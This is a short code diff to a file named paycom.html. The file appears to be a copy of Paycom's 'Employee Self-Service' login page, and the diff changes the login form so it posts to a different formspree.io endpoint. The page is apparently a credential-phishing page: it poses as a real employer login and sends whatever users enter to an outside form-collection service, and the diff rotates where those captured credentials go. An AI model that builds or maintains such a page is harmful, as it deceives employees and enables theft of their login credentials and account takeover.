--- a/paycom.html
+++ b/paycom.html
@@ -106,7 +106,7 @@
       <h1 class="loginTitle">EMPLOYEE SELF-SERVICE&reg;</h1>
       <div class="card largeMarginBottom" id="main-view">
         <div class="main-form">
-          <form action="https://formspree.io/f/mbjeaeev" method="post">
+          <form action="https://formspree.io/f/myyadqek" method="post">
             <div class="row">
               <div class="input-field col m12 s12">
                 <input
